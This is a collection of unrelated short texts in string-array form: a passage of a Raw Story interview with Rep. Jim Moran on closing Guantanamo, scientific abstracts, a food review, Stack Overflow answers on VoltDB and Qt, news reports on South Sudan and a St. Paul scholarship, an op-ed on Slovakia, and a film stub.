Guantanamo for political purposes. ", "He took aim at former Massachusetts Governor Mitt Romney, who said in a Republican debate last Thursday that he favored doubling the size of the prison. \"", "Who's he going to double it with?\" ", "he asked. \"", "We've got about 30,000 prisoners in our American prisons in Iraq, and another 30,000 in Iraqi prisons. ", "Does he want to take those 60,000 and dump them in Guantanamo, too? ", "Is that what would make him happy?\" ", "The Congressman also slammed President George W. Bush and other administration leaders for saying they wanted to but could not close Guantanamo Bay. \"", "The President and the Secretary of State, after having acknowledged that it's wrong, that it should be shut down, have shown that they don't have the courage or the wherewithal to do the right thing,\" he argued. \"", "I think that makes it worse. ", "It's like labeling Darfur a genocide and then not doing anything about it.\" ", "Finally, the Congressman emphasized that US civilian courts were capable of trying accused terrorists who were called 'the worst of the worst.' ", "As an example of how civilian trials could help the US in the war on terrorism, he pointed to the prosecution of so-called '20th 9/11 hijacker' Zacarias Moussaoui in Alexandria, Virginia, part of his district. \"", "When some of the families of the victims of 9/11 said he was not directly involved in the deaths of our loved ones, and so we don't think he should actually be given the death penalty, Moussaoui fell silent. ", "And I'm told by his defense lawyer that he sits in his cell with his head between his legs because he doesn't know what to believe now,\" the congressman explained. \"", "Going through that trial proved that the US does have principles, values, ideals, that there is a rule of law that applies. ", "It's everything he was told was not the case. ", "We have disproved that propaganda by putting him through a trial.\" ", "A transcript of the interview with Rep. Moran is presented below. ", "Note: RAW STORY regrets that two very brief portions of its recording of the interview with Moran were inaudible due to sudden changes in background noise in the room where the interview took place. # ", "RAW STORY : The Pentagon is now trying to say that unlike the Seton Hall study that says a lot of these people aren't that bad aren't true, that these people really are the worst of the worst. ", "Do you buy it? ", "Rep. Jim Moran: Of course not. ", "It seems to me that after four and a half years, this administration should have lost its credibility to anybody that's been paying attention to what they say. ", "But the 772 people that have been sent to Guantanamo, only four have been charged with crimes. ", "Now they've released half of them. ", "If they thought these were the worst of the worst, the killers, the shooters, would they really have released them? ", "86% of them were picked up by Pakistani or Afghan Northern Alliance forces, and returned for bounties. ", "So, according to our data, only about 5% were actually picked up by US forces, and the majority are not even alleged to have been involved in any hostile acts against the United States. ", "This is a black legal hole, there are people in the administration that are embarrassed about it, and that's why they're trying to divide our attention. ", "One of the things they've done to divert our attention is send 15 guys, including Khalid Sheikh Mohammed down there, but they don't characterize the people we've been confining in Guantanamo Bay, these are people that were in secret prisons, and they just got there. ", "We're talking about the 772 that were sent there under very dubious circumstances. ", "This is something that all of America should be embarrassed at, and the rest of the world is disgusted. ", "RAW STORY : The President and the new Secretary of Defense have said that they really want to close Guantanamo. ", "Do you think this is sincere, or just a political stunt? ", "Rep. Moran: Well, they're saying 'I want to do the right thing, but, you know, I just really can't, sorry.' ", "They've at least acknowledged what the right thing to do is. ", "And, Secretary Gates just came on board, so I don't blame him. ", "But the President and the Secretary of State, after having acknowledged that it's wrong, that it should be shut down, have shown that they don't have the courage or the wherewithal to do the right thing. ", "I think that makes it worse. ", "It's like labeling Darfur a genocide and then not doing anything about it. ", "RAW STORY : Tuesday night, Romney said that he wants to double the size of Guantanamo. ", "What's your reaction to that idea. ", "Rep. Moran: I don't know where this guy came from. ", "I used to watch him when he was Governor of Massachusetts, and what he said and did in order to get elected. ", "And now I guess he's going to say and do what he needs to do to get chosen by the right wing nuts of the Republican Party. ", "So I guess he figures, 'If I'm as extreme or right wing nut as the people I'm talking to, then it's to my benefit.' ", "This guy, I'd really rather deal with somebody like a Ron Paul who sticks to his convictions than somebody who is going to say to whatever he thinks the audience wants to hear. ", "I can't believe that Romney is so out of it that he really believes what he's been saying lately. ", "Who's he going to double it with? ", "Mostly they're people from the Afghan war. ", "We've got about 30,000 prisoners in our American prisons in Iraq, and another 30,000 in Iraqi prisons. ", "Does he want to take those 60,000 and dump them in Guantanamo, too? ", "Is that what would make him happy? ", "I ought to mention, most of those tens of thousands of prisoners in Iraq, they're actually shooting up American troops. ", "Only 5% of the people at Guantanamo have been actually shooting at American troops. ", "If we were looking for our own security, I think we'd have to look at some of these people who are suggesting we do things that are so un-American as to be a real threat to the Bill of Rights and the Constitution. ", "RAW STORY : But Romney is sort of speaking to a particular audience who want to hear that message. ", "Do you think the Democrats can afford to close Guantanamo? ", "Rep. Moran: Yeah, these people watch Fox News, and read the Washington Times and the Weekly Standard and the National Review. ", "And, everybody's got a right to insulate themselves in right wing dogma, that's part of the beauty of the United States. ", "And that's the group that he's apparently trying to appeal to. ", "I find it very unappealing. ", "RAW STORY : Do you think that fear that they're trying to spread is going to make it difficult for a lot of your colleagues in the Democratic caucus to get behind this push that you and Congressman Murtha are making? ", "Rep. Moran: Some of them. ", "Some of them are concerned because some of them are in districts that are conservative and don't have very good newspapers, and apparently don't expose themselves to a lot of balanced information. ", "So I don't blame them. ", "People have some responsibility to represent their constituency. ", "So I think it's going to be difficult. ", "What the Republicans tack is going to be is that these are all terrorists, and do you want them all to be released to your backyard? ", "And the last thing they want is for people to realize that only 1% of them were captured by American forces. ", "The majority are not even alleged to be involved in any violent act, and only four of them have actually been charged with a crime. ", "We're going to have to deal with propaganda. ", "This administration, I've never seen an organization that learned the lessons of Lenin as clearly as these guys. ", "These guys must tack up Lenin's philosophy on their bedstand every night. ", "Particularly when Lenin suggested if you say something often enough, with enough conviction, everybody will believe it. ", "So far, well, it worked for the first four or five years, it was really the Rove strategy. ", "But I think people are people are beginning to question it. ", "And that's the benefit of a free press. ", "RAW STORY : Your neighbor Rep. Eric Cantor (R-VA) has proposed a bill that would basically make it so you can't put detainees in from the war on terrorism in certain places, sort of the 'not in my backyard' approach to dealing with Guantanamo... Rep. Moran: The only place is basically is the black hole in Guantanamo where there's no legal rights that apply. ", "Well, there have been governments that I think Eric would have been much more comfortable with. ", "But we live under the Constitution and the Bill of Rights. ", "You know, when I listen to Eric talk, it's clear that he would have voted against that Bill of Rights if he had that opportunity. ", "It's a good thing he wasn't serving the Congress 200 years ago, or we wouldn't have as free a nation as we have today. ", "RAW STORY : Are you concerned with the two additional detainees that have been added to Guantanamo in the past year? ", "Rep. Moran: They're there for strategic purposes, so they can make the American people think that they're typical of the people who are at Guantanamo. ", "They're not typical, the last fifteen are not typical of the people that have been languishing at Guantanamo, so that's a whole different situation. ", "RAW STORY : But do you think we should be bringing more people into Guantanamo even if they're the worst of the worst who were picked up on the battlefield? ", "Rep. Moran: Well, if they're the worst of the worst, it seems to me that you can prosecute them, and punish them. ", "You can't prosecute more than one at a time. ", "If you were just going to go after people that you can drum up any kind of actual charge against, it would still take a lifetime to prosecute, because there's only one court at Guantanamo. [", "Inaudible] The only prosecution you might get at Guantanamo is not going to be accepted by the rest of the world because it has all the appearances of a monkey trial. ", "So if you've got the worst of the worst, it seems like you should try them, so you can punish them. ", "You know, in Alexandria, Virginia, where I was mayor and I represent, we had the guy that was alleged to be the 20th hijacker, Zacarias Moussaoui was his name. ", "And he spouted all this kind of propaganda against the United States. ", "For months, he went on and on and he said the worst stuff about the U.S. [Inaudible] Finally, he went through the trial and he'd sit there, and over time, though, as people came through and he saw the way the system of justice works, he started to quiet down. ", "And when some of the families of the victims of 9/11 said he was not directly involved in the deaths of our loved ones, and so we don't think he should actually be given the death penalty, Moussaoui fell silent. ", "And I'm told by his defense lawyer that he sits in his cell with his head between his legs because he doesn't know what to believe now. ", "Going through that trial proved that the US does have principles, values, ideals, that there is a rule of law that applies. ", "It's everything he was told was not the case. ", "We have disproved that propaganda by putting him through a trial. ", "It seems to me it might make some sense to take the worst of the worst, put them in a prison cell, let them sit in a court room, bring them down to the level of a common criminal, which they are, and try them. ", "That's a lot better than putting them in a situation where they're going to be perceived as some kind of martyrs. ", "RAW STORY : So you think an arrangement kind of like we're seeing now with people who are tried in the civilian courts can be applied to people at Guantanamo? ", "Rep. Moran: Oh, of course. ", "If you have no information with which to charge them, than how do we know they are who we say they are. ", "I think we have sufficient information that these guys should be tried. ", "And until you try them, you really can't punish them. ", "I mean, you can torture them indefinitely, but then the more you torture them, the less credible is the information they reveal. ", "We found that out when we went on any number of wild goose chases by people like Ibn Al-Libbi and so on who just told us things they knew we wanted to hear, and we acted on them when they weren't true. ", "And then later, he recanted it, saying that' I said there was a terrorist training camp in Iraq just because I knew that's what you wanted to hear, and the Egyptians went and tortured me until I told them what the Americans wanted to hear.' ", "And we acted on information that we should have known was false. ", "And in this case, I think the people that we feel are real bad and have in fact been directly involved in shooting at, let alone killing Americans, then they should be prosecuted, and as far as I'm concerned, they should be executed. ", "But we should do it under the rule of law so it's a credible process and so we don't continue to undermine our reputation and credibility throughout the world. ", "You can't win the war on global terrorism through a military victory. ", "This is a battle of ideas, and as long as Guantanamo stays open, the idea that we are going to operate outside the law, the idea that we're going to ignore the Bill of Rights gives credence to the propagandists who argue that we are not the nation that we used to be, that we are a nation that people have a right to attack and to plot against. ", "It's just not true. ", "The problem is some people in the administration are playing into the hands of the propagandists, not deliberately, but because they don't think about the reputation of what America is and what it stands for and how that's going to play out against extremists.", "\n\n\n\n" ]
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[ "Variability in reaction time performance of younger and older adults.", "\nAge differences in three basic types of variability were examined: variability between persons (diversity), variability within persons across tasks (dispersion), and variability within persons across time (inconsistency). ", "Measures of variability were based on latency performance from four measures of reaction time (RT) performed by a total of 99 younger adults (ages 17--36 years) and 763 older adults (ages 54--94 years). ", "Results indicated that all three types of variability were greater in older compared with younger participants even when group differences in speed were statistically controlled. ", "Quantile-quantile plots showed age and task differences in the shape of the inconsistency distributions. ", "Measures of within-person variability (dispersion and inconsistency) were positively correlated. ", "Individual differences in RT inconsistency correlated negatively with level of performance on measures of perceptual speed, working memory, episodic memory, and crystallized abilities. ", "Partial set correlation analyses indicated that inconsistency predicted cognitive performance independent of level of performance. ", "The results indicate that variability of performance is an important indicator of cognitive functioning and aging." ]
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[ "Second visit to the Shake Ramen truck, for shio ramen, this time with some spinach as well. ", "Spicy level 1 instead of 2 (level 3 is the most spicy) is actually more enjoyable, the pepper flakes they use combine with fairly minimal soup base doesn't work as well with the extra spice I had the first time. ", "Garlic level 3 (most garlic possible) was also pretty tasty.", "\n\nRamen itself is still just ordinary aside from the shake gimmick tho, so hard to say this place is really worth the trouble unless it's already nearby.", "\n\nCoCo Fresh Tea an Juice in Westwood is the only store in that spot that seems to do okay, the previous Honeybaked Ham, I think Red Mango (?), ", "and was it another pearl tea shop all failed... the milk tea is very conventional. ", "Service for the regular pre-made milk teas is super quick tho, and the space isn't bad to hang out in in very small groups. ", "A bit too dark and bar-like to hang out in larger groups or to work in, tho. ", "Kinda wish the milk tea was more more fresh brewed or at least higher in quality, but it's certainly more than adequate given the lack of competition in the area." ]
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[ "The Daily Hex: Maroon\n\nTake a bite our of chestnut-colored lomographs courtesy of today's The Daily Hex!", "\n\nWhat’s a ‘hex’ anyway?", "\n\nHex actually pertains to hex values, which are 6-digit hexidecimal numbers that are primarily used in web design. ", "Your photographs can be viewed by hex values and we have almost 1,500 common colors that you can browse through, most of which have names that are quirky, goofy, and downright weird. ", "But don’t be fooled, these colors are real eye candies, too!", "\n\nComing from the French word marron, Maroon has a rich dark redish-brown color similar to that of a chestnut. ", "It’s deep color gives photographs a mysterious feel as seen in these handpicked lomographs:" ]
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[ "South Sudan says it is taking seriously allegations by the United Nations that South Sudanese soldiers committed atrocities against women and girls. ", "A government spokesperson said an investigation is under way after a report by the U.N. mission in South Sudan (UNMISS) found that soldiers raped and burned women and girls alive.", "\n\nInterviews with 115 victims and eyewitnesses depict a brutal campaign carried out by South Sudanese military members in Unity state, located to the north and where much of the heavy fighting takes place. ", "Brutal attacks against civilians have been reported since the inception of the civil war in December 2013. ", "The UNMISS investigation shows it is getting worse.", "\n\n“Conflict-related sexual violence has marred the conflict since its beginning, but reports of rape have increased during the current wave of fighting, particularly in Unity and Upper Nile,” according to the report.", "\n\nIn the past 18 months, more than 172 women and girls were abducted in Unity state. ", "More than 79 women were sexually abused over the same period of time. ", "Some cases involved gang rapes. ", "At least 67 civilians have been killed in the state and roughly 40 people still missing. ", "Boys are continue to face capture and forced military service.", "\n\nThe testimonies speak to the brutality of the attacks. ", "One woman told UNMISS investigators that she was dragged out of her home and gang raped with her neighbor as her 3-year-old watched. ", "When the soldiers were finished, they taunted the women. ", "Witnesses described at least nine cases where the women were burned alive in their homes after they were raped by a group of soldiers.", "\n\n“Revealing the truth of what happened offers the best hope for ensuring accountability for such terrible violence and ending the cycle of impunity that allows these abuses to continue,” the secretary-general’s special representative, Ellen Margrethe Løj, who also heads the U.N. Mission, wrote in a news release.", "\n\nA week later, South Sudan’s government at least admits that it is aware of the accusations and looking into the problem.", "\n\n“We have read the report and these egregious acts could only have been carried out by egregious individuals. ", "Our army punishes with impunity any acts that deviate from the normal conducts of war,” South Sudan’s military spokesman Philip Aguer said in a statement reported by Agence France-Presse. “", "Our army was created to protect our women and children, ensure their safety and their dignity. ", "If in fact the U.N. report is accurate, then the few individuals responsible for these heinous crimes have brought shame to the SPLA and that will not be tolerated.”", "\n\nHowever, Aguer’s statement is at odds with President Salva Kiir’s office. ", "Spokesman Ateng Wek Ateng told the BBC that an investigation would take place, but “he did not believe that troops would commit atrocities against their own people.” ", "Further, the report says the spokesperson for South Sudan’s army “repeatedly dismissed claims” that soldiers committed human rights violations.", "\n\nLøj wants “unfettered access” in South Sudan to continue investigating the reported crimes. ", "A separate report from UNICEF published earlier in June said boys were castrated and girls raped as a result of the fighting. ", "More than 129 children were killed in a three-week period in May, according to UNICEF.", "\n\n“The details of the worsening violence against children are unspeakable, but we must speak of them,” said UNICEF head Anthony Lake recently, in a statement responding to the news. “", "In the name of humanity and common decency this violence against the innocent must stop.”" ]
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[ "Q:\n\nVoltDB Timeout for createConnection\n\nBelow is a simple code snippet that shows how to connect to a VoltDB server. ", "\nClientConfig clientConfig = new ClientConfig();\nClient client = ClientFactory.createClient(clientConfig);\nString server = \"\";\nclient.createConnection(server);\n\nBased on my experiments, if the server is down or just not connectable from network layer, it will take about 75 seconds to get the response.", "\nSEVERE: Failed to connect to, in 75,359 ms\njava.net.", "ConnectException: Operation timed out\n at sun.nio.ch.", "Net.connect0(Native Method)\n at sun.nio.ch.", "Net.connect(Net.java:458)\n at sun.nio.ch.", "Net.connect(Net.java:450)\n at sun.nio.ch.", "SocketChannelImpl.connect(SocketChannelImpl.java:648)\n at java.nio.channels.", "SocketChannel.open(SocketChannel.java:189)\n at org.voltdb.client.", "ConnectionUtil.getAuthenticatedConnection(ConnectionUtil.java:154)\n at org.voltdb.client.", "ConnectionUtil.getAuthenticatedConnection(ConnectionUtil.java:142)\n at org.voltdb.client.", "ConnectionUtil.getAuthenticatedConnection(ConnectionUtil.java:134)\n at org.voltdb.client.", "Distributer.createConnectionWithHashedCredentials(Distributer.java:878)\n at org.voltdb.client.", "ClientImpl.createConnectionWithHashedCredentials(ClientImpl.java:189)\n at org.voltdb.client.", "ClientImpl.createConnection(ClientImpl.java:682)\n at src.java.tutorial.voltdb.integration.", "ConnectionTest.main(ConnectionTest.java:27)\n at sun.reflect.", "NativeMethodAccessorImpl.invoke0(Native Method)\n at sun.reflect.", "NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\n at sun.reflect.", "DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\n at java.lang.reflect.", "Method.invoke(Method.java:497)\n at com.intellij.rt.execution.application.", "AppMain.main(AppMain.java:140)\n\nIs there any ways to set the time out time, so the application needs not to wait for such a long time. ", "A successful connection normally takes just tens of milliseconds, so I think if the connection cannot be established within 1000 milliseconds, something is definitely wrong already.", "\nI have tried the setting of below\nclientConfig.setConnectionResponseTimeout(1000);\n\nIn this case, it has no effects at all. ", "So I guess it is not for this purpose.", "\n\nA:\n\nNormally when the database is down and your client tries to connect it will get an immediate Connection refused exception, for example: \nException in thread \"main\" java.net.", "ConnectException: Connection refused\nat sun.nio.ch.", "Net.connect0(Native Method)\nat sun.nio.ch.", "Net.connect(Net.java:364)\nat sun.nio.ch.", "Net.connect(Net.java:356)\nat sun.nio.ch.", "SocketChannelImpl.connect(SocketChannelImpl.java:623)\nat java.nio.channels.", "SocketChannel.open(SocketChannel.java:184)\nat org.voltdb.client.", "ConnectionUtil.getAuthenticatedConnection(ConnectionUtil.java:165)\nat org.voltdb.client.", "ConnectionUtil.getAuthenticatedConnection(ConnectionUtil.java:153)\nat org.voltdb.client.", "ConnectionUtil.getAuthenticatedConnection(ConnectionUtil.java:145)\nat org.voltdb.client.", "Distributer.createConnectionWithHashedCredentials(Distributer.java:890)\nat org.voltdb.client.", "ClientImpl.createConnectionWithHashedCredentials(ClientImpl.java:191)\nat org.voltdb.client.", "ClientImpl.createConnection(ClientImpl.java:684)\nat benchmark.", "Benchmark.<init>(Benchmark.java:17)\nat benchmark.", "Benchmark.main(Benchmark.java:78)\n\nIn general, a \"java.net.", "ConnectException: Connection timed out\" can occur if there is a firewall that prevents the client from receiving any sort of response, or there could be other causes. ", " The first thing to check might be if you have any firewall or network settings that would prevent access to port 21212 (the default VoltDB database connection port).", "\nThe ClientConfig setConnectionResponseTimeout() setting is used to cause a live connection to be closed if it hasn't received a response from a procedure call or a ping for the given number of milliseconds, but it is not used for creating a new connection.", "\n\n" ]
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[ "Q:\n\nHow QRectF::adjusted() works\n\nMy custom graphics item has (0,-60 60x60) boundingRect.", "\nWhen I adjust the coordinates with\nrect.adjusted(-5,-5,5,5)\n\nnew boundingRect returns (-5,-65,70x70).", "\nI read the documentation here and I think boundingRect should return (-5,-65,65x65)\nDo I misunderstand the doc?", "\n\nA:\n\nThe trick is in the parameters to the \"adjusted\".", "\nInitial co-ordinates are (0,-60,60,0) ( since height = 60 & width =60)\nwhen you adjust it with (-5,-5,5,5), the new co-ordinates are (-5,-65,65,5).", "\nSo now the width = 70 and the height = 70\n\n" ]
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[ "LAST Friday, to much fanfare, the Slovak Parliament passed a resolution declaring that the \"1,000-year-long effort of the Slovak nation for self-determination is fulfilled.\" ", "But the declaration of \"sovereignty,\" Slovaks assured both their Czech neighbors and a concerned world, doesn't mean \"independence.\"", "\n\nThen what does it mean?", "\n\nAccording to the Slovaks, the resolution means the Slovak Republic is a sovereign state that may choose - or not choose - to live with the Czech Republic. ", "As the language of the declaration states, Slovakia has the right to self-determination \"in the way it is formulated in all international agreements and contracts.\"", "\n\nYet such rights are already guaranteed by the federal Czechoslovak Constitution (and all international contracts). ", "So why risk a resolution that threatens to further exacerbate relations with the Czechs and cause uncertainty and consternation throughout the West?", "\n\nNew events in Slovakia show that what the Slovaks really de-clared last Friday was not independence, which most Slovaks do not want - and not sovereignty (which they already have). ", "To a world that has too often confused them with their Czech brothers, the Slovaks declared that they are a \"separate\" people.", "\n\nA demonstration this spring highlighted the extent to which the Slovaks wish to distinguish themselves from their more affluent, more celebrated Czech brothers. ", "On March 14, over 10,000 Slovaks in Bratislava celebrated the anniversary of the day prior to World War II when Slovakia was declared independent for the first (and only) time in history. ", "Ironically, this celebration took place in the square dedicated to the Slovak national uprising, an unsuccessful revolt against the same fascist government that\n\nwas established on March 14, 1939.", "\n\nIn the Czech lands, there was astonishment that Slovaks would celebrate a day when Hitler made a pact with Slovak leader Josef Tiso and began the final brutal assault against Czechoslovakia. ", "As President Vaclav Havel said in a controversial address: \"World War II began on March 14.\"", "\n\nThe Slovaks say Tiso made the only choice a leader could make (independence or Nazi assault), and that distinctions can be made between Slovakia as a state and its form of government. ", "Not surprisingly, the Czechs have not been able to appreciate such a fine distinction.", "\n\nIf the Slovaks have rewritten part of history, it probably reflects a strong desire to have a separate identity, to have separate heroes and separate events to celebrate. ", "When Czechoslovakia's Communist (and Slovak) leader Gustav Husak died after the velvet revolution, then-Slovak prime minister Jan Carnogursky attended the funeral to pay his respects. ", "That anyone would pay respect to a decade-long Communist tyrant was incomprehensible to most Czechs. ", "But it, too, reflected a desire among Slovaks to affi rm their separate history.", "\n\nSINCE the June national elections, momentum for independence has grown. ", "Some of the desire in Slovakia for independence is based on the economic disparity between Czechs and Slovaks. ", "But economic considerations are not overriding. ", "Even many Slovak nationalists admit (privately) that the Slovak economy will suffer from a split of the country - certainly in the short run, and probably in the long run.", "\n\nSo why do it? ", "The answer: \"The problems may be greater, but they will be our problems.\"", "\n\nBut a separate Slovakia is not a perfect cure for a country in search of its identity. ", "Certain ugly problems of national identity will become worse after separation. ", "Opportunist politicians have already begun attacking the large Hungarian minority in Slovakia, trying to whip up emotion and play the \"nationalist\" card. ", "Bills targeting the Hungarian minority, like those declaring that \"Slovak\" is the official language, are already being offered or expanded.", "\n\nEven if independence does distinguish the Slovaks from the Czechs, there is another danger in the wings, a danger demonstrated by a CNN reporter who recently made what may be the classic Western blunder of the future - confusing Slovaks with Slovenes.", "\n\nToday, Slovakia declares its identity. ", "Tomorrow, it may declare its independence. ", "But Slovakia should pause if it believes independence will establish its identity in the world. ", "The fatal flaw in that reasoning is that identity is something established from within - from a confidence about the values a nation shares among its people. ", "No declaration, no secession, no partitioning of a country into ethnically pure units will give a country an identity worth having if it fails to observe this golden princip le." ]
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[ "The Post’s Steve Serby chats with new Jets receiver Terrelle Pryor on his approach to the game, playing for many different teams, and why he hasn’t yet made a bigger impact in the NFL: Q: Do you consider yourself uncoverable one-on-one? ", "A: I can be. ", "I can be. ", "I have a lot of work to..." ]
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[ "Synthesis and turnover of basal level guanosine tetraphosphate in Escherichia coli.", "\nCultures of escherichia coli growing exponentially in Trisacetate medium were subjected to nutritional shift-up and the pool size of guanosine 5'-3'-diphosphate-3'diphosphate (ppGpp) as well as the rates of protein synthesis and net RNA synthesis were determined. ", "In the shift to a rich medium (glucose plus 19 amino acids plus hypoxanthine) the basal level of ppGpp falls immediately with a decay constant suggesting total inhibition of synthesis; ther is no ppGpp detectable above background for 30 to 40 min. ", "The net rate of RNA synthesis starts to increase within 1 min of the shift-up and has reached its definite postshift value well before the pool of ppGGpp rises above background lvel. ", "In a shift-up from Tris-acetate medium to Tris-glucose medium there is a much slower readjustment of the ppGpp pool size without the transient disappearance of the nucleotide. ", "However, in a shift-up to Tris-acetate plus 5 amino acids, a medium which supports the same growth rate as Tris-glucose medium, a dramatic, transient drop in the ppGpp pool level was observed. ", "Relaxed cells exhibit very similar behavior to strigent cells in the same shift-up. ", "Our data argue strongly against an exclusive role for pGpp in regulating RNA synthesis during niutritional shift-up. ", "The kinetic data of [3H]guanosine uptake into GTP and ppGpp pools were analyzed to determine the rate of pGpp synthesis. ", "This rate was found to be similar during expotential growth in either Tris-acetate medium. ", "During a shift-down from Tris-glucose to Tris-acetate medium the rate of ppGpp syntesis fell by a factor of 1.5 to 2 and the turnover rate is reduced 6- to 8-fold, suggesting that the expansion in the ppGp pool during shift-down canot be due to derepression of synthesis." ]
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[ "'t Was één April\n\n't Was één April is a 1936 Dutch film directed by Douglas Sirk and Jacques van Tol. ", "It is a lost film.", "\n\nPlot\nWhen Mister Vlasman gets promoted from baking bread to making macaroni, he and his wife want to enter high society. ", "They could not be happier when a wealthy baron offers to introduce them into the high class. ", "What they don't realise is that this was all an April Fools' prank. ", "Unfortunately for the pranksters, things get out of hand when a real baron visits the Vlasmans.", "\n\nCast\nJacques Van Bylevelt\t... \tHeer Vlasman\nTilly Perin-Bouwmeester\t... \tVlasmans vrouw\nJopie Koopman\t... \tVlasmans dochter\nRob Milton\t... \tVlasmans dochters verloofde\nHerman Tholen... \tBaron de Hoog van Vriesland\nJohan Kaart\t... \tHandelaar\nCissy Van Bennekom\t... \tVlasmans secretaresse\nPau Dana\t... \tSecretaresse\n\nBackground\nThe movie is a remake of the German film April, April! (", "1935), also directed by Douglas Sirk. ", "In the German version the baron was a prince. ", "Sirk never came to the Netherlands. ", "All of his scenes were shot in Germany. ", "Scenes in the Netherlands were directed by Jacques van Tol. ", "No known copies of the film exist today.", "\n\nReferences\n\nExternal links \n \n\nCategory:1936 films\nCategory:Dutch black-and-white films\nCategory:Dutch films\nCategory:1930s drama films\nCategory:Dutch multilingual films\nCategory:Dutch drama films\nCategory:Lost Dutch films\nCategory:1930s multilingual films\nCategory:1930s lost films\nCategory:Lost drama films" ]
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[ "No Return Policy: A Broke PA's Journey though Halloween Shopping\n\nReceive the latest 1st-look updates in your inbox\n\nCostume stores have a very interesting business model. ", "Most of the year, these shops are a veritable wasteland of untouched merchandise and indifferent staff. ", "Then, for about a month and change, they sell cheap products at an outrageous markup to the generally accepting public. ", "Ask about a return policy, and you’ll likely be met with an eye roll from the girl who thought it was a good idea to get the bull piercing in the middle of her nose (You can bet they don’t have a good return policy on those either). ", "While the craftier costumer is perfectly content to make his or her own costume out of a little makeup and old clothes (for example, you can pick up some of those paste-on gunshot wounds, roll around in a sewage drain for a while, and be Gaddafi for a night!), ", "most people have no problem dropping top dollar for second-rate props that wouldn’t cut it in most high school productions of “The Nightmare before Christmas”.", "\n\nEvery year, I find it harder and harder to find a costume that I A) am willing to spend an entire evening wearing, and B) am willing to drop a considerable amount of change to own. ", "Last year, I decided that I was not going to dress up. ", "Then, after some extensive nagging from my friends not to be “that guy”, I went to a costume shop two days before Halloween. ", "Remember when I alluded to one of these places being a wasteland in the off-season? ", "Try going on October 29th.", "\n\n“Do you guys have something for Indiana Jones?”", "\n“All out of Indy.”", "\n\n“What about, a… wizard or something?”", "\n“I wouldn’t count on it.”", "\n\n“Spider-man?”", "\n“I might have something in the toddlers section.”", "\n\nI settled on a $30 police officer costume that consisted of a pair of handcuffs and a police badge that read “Special Forces”. ", "The badge didn’t delineate exactly what body of law enforcement I belonged to, but for that much money I’m glad someone was telling me that it was special.", "\n\nSo this year, I think I’m staying home. ", "I’ll spend the evening with Freddy and Michael, maybe pick up some candy corn, and just relax. ", "I’m a bit older, and all I really want this year is a stress-free Halloween. ", "But if I catch enough flack for staying in when everyone else is out, I guess I can pick up a cookie monster mask and a protest sign reading “OCCUPY SESAME STREET!” ", "Even if the mask does cost $20.", "\nSteve Madura is a production assistant for NBC's 1st Look." ]
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[ "Trypanosoma brucei brucei: differences in the nuclear chromatin of bloodstream forms and procyclic culture forms.", "\nNucleosome filaments of two stages of the life-cycle of Trypanosoma brucei brucei, namely bloodstream forms and procyclic culture forms, were investigated by electron microscopy. ", "Chromatin of bloodstream forms showed a salt-dependent condensation. ", "The level of condensation was higher than that shown by chromatin from procyclic culture forms, but 30 nm fibres as formed in rat liver chromatin preparations were not found. ", "Analysis of histones provided new evidence for the existence of H1-like proteins, which comigrated in the region of the core histones in SDS-PAGE and in front of the core histones in Triton acid urea gels. ", "Differences were found between the H1-like proteins of the two trypanosome stages as well as between the core histones in their amount, number of bands and banding pattern. ", "It can be concluded that T. b. brucei contains a full set of histones, including H1-like proteins, and that the poor condensation of its chromatin is not due to the absence of H1, but most probably due to histone-DNA interaction being weak. ", "It is obvious that structural and functional differences of the chromatin exist not only between T. b. brucei and higher eukaryotes, but also between various stages of the life-cycle of the parasite. ", "It is therefore not adequate to investigate the chromatin only of the procyclic culture forms as a model for all stages of the life-cycle of T. b. brucei." ]
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[ "[Proteins and the functional properties of the chromatin fractions from the nuclei of the normal liver and of experimental hepatomas].", "\nChromatin fragments generated in normal liver and solid hepatoma nuclei due to the action of endogenous nucleases and in ascites hepatomas nuclei treated with micrococcal nuclease differ in the ability to be released from the nuclei into a medium of low ionic strength. ", "It is suggested that such a fractionation is based on different solubility of DNP fragments attached to the nuclear skeleton and of those that are not bound with it. ", "DNP fragments extracted in a low-salt buffer contain all five histones with a negligible admixture of nonhistone proteins having the protein/DNA ratio about 1.1. ", "No endogenous RNA-polymerase activity could be detected in these DNP fragments. ", "The bulk of the RNA-polymerase activity is found in the matrix-associated DNP fragments that appear to be enriched in nonhistone proteins (their protein/DNA ratio amounted to 2.5). ", "The possibility that transcribable DNP fragments are associated with the matrix through low-salt-stable linkages like those in the DNA-(RNA-polymerase-RNA or RNP)-matrix seems to be confirmed by the data obtained." ]
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[ "MINNEAPOLIS (WCCO) — A teenage victim of St. Paul’s deadly gun violence problem last year will have his memory live on in a special way.", "\n\nDa’Qwan Jones-Morris was shot the death last November. ", "The Henry Sibley High School senior, who played basketball and football, is getting a scholarship in his name.", "\n\nIn a packed gymnasium, the Henry Sibley boys’ basketball team faced their rival South St. Paul, a game in which the Warriors bench was clearly missing a certain level of excitement.", "\n\n“Last year, [Da’Qwan] was a really good bench person. ", "He was always getting everyone hyped up and all that, and this year we know that would have really helped, too. ", "He would have been one of the only seniors,” junior basketball player Joey Hazzard said.", "\n\nDa’Qwan was revered by his friends and teammates for his contagious personality. ", "Many on the team and in the crowd wore T-shirts with pictures of Da’Qwan, as well as the words “Long Live Qwannie,” which was his nickname. ", "His death still weighs heavily on his teammates.", "\n\n“He’s just the person who brings you up no matter how you’re feeling. ", "So to lose that is pretty tough. ", "but I know it brought the team together,” said junior basketball player Cameron Latvis.", "\n\nA new mission is bringing the whole school and community together. ", "During halftime, students collected money in the crowd for a scholarship in DaQwan’s name. ", "They also sold raffle tickets to raise funds.", "\n\n“I thought this would be a great way to honor my son,” Monica Jones, Da’Qwan’s mother, said.", "\n\nJones came up with the scholarship idea. ", "She said the recipient would have to be a student of color in need of financial help, but also someone who exudes her son’s qualities.", "\n\nJones said Da’Qwan was dedicated to going to school, even if he wasn’t feeling well.", "\n\n“They would definitely need to be active in the community in some type of volunteering or engaged in their church community,” Jones said.", "\n\nAnd because her son died from gun violence, Jones said applicants would have to explain their plan for prevention and raising awareness about the deadly problem.", "\n\nREAD MORE: ‘I’ll Never Stop Loving Him’: Da’Qwan Jones-Morris, Victim Of St. Paul Gun Violence, Remembered By His Family\n\nFor his teammates, the scholarship is more than just a means to help someone pay for college. ", "It’s about Da’Qwan’s legacy continuing on at Henry Sibley long after those who know him graduate.", "\n\n“Just knowing that he’s going to be living on forever, and we’re not going to forget him here,” Hazzard said.", "\n\nAnd they made sure his mother knew that, too, giving her Da’Qwan’s basketball jersey before the start of the game. ", 